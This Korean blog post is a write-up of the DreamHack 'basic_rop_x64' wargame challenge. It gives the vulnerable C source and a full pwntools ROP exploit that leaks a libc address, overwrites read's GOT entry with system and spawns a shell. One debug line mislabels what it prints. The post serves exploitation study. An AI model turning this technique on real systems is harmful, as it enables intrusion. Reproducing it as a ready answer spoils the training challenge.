본문 바로가기
DreamHack: System Hacking/F Stage 7

basic_rop_x64

Kimteger 2023. 6. 14. 19:22

[소스코드]

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>


void alarm_handler() {
    puts("TIME OUT");
    exit(-1);
}


void initialize() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);

    signal(SIGALRM, alarm_handler);
    alarm(30);
}

int main(int argc, char *argv[]) {
    char buf[0x40] = {};

    initialize();

    read(0, buf, 0x400);
    write(1, buf, sizeof(buf));

    return 0;
}

 

[exploit]

exploit payload를 보낸 스택의 구조

from pwn import *
arch
p = process("./basic_rop_x64")
e = ELF("./basic_rop_x64")
l = ELF("./libc.so.6")

read_plt = e.plt['read']
read_got = e.got['read']
write_plt = e.plt['write']
pop_rdi = 0x400883
pop_rsi_r15  = 0x400881
ret = 0x4005a9

buf = b'A'*64
payload = buf + b'B'*8
payload += p64(pop_rdi) + p64(1) + p64(pop_rsi_r15) + p64(read_got) + p64(0) + p64(write_plt) # (1) leak addr of read()
payload += p64(pop_rdi) + p64(0) + p64(pop_rsi_r15) + p64(read_got) + p64(0) + p64(read_plt) # (2) read() -> system()
payload += p64(pop_rdi) + p64(read_got+0x8) + p64(ret) + p64(read_plt) # (3) read("/bin/sh") == system("/bin/sh")
p.send(payload)
p.recvuntil(buf)
read = u64(p.recvn(6)+b'\x00'*2) # addr of read()
libc_base = read - l.symbols['read']
system = libc_base + l.symbols['system']


print('read:', hex(read))
print('libc_base:', hex(read))
print('system:', hex(system))

p.send(p64(system) + b"/bin/sh\x00") # (2) read() -> system() & read_got + 0x8 == "/bin/sh"

p.interactive()

'DreamHack: System Hacking > F Stage 7' 카테고리의 다른 글

basic_rop_x86  (0) 2023.06.14
[함께 실습] Return Oriented Programming  (0) 2023.06.11
[함께 실습] Return to Library  (0) 2023.06.10
ASLR, NX & Static-Link, Dynamic-Link  (1) 2023.06.10

'DreamHack: System Hacking/F Stage 7' Related Articles

티스토리툴바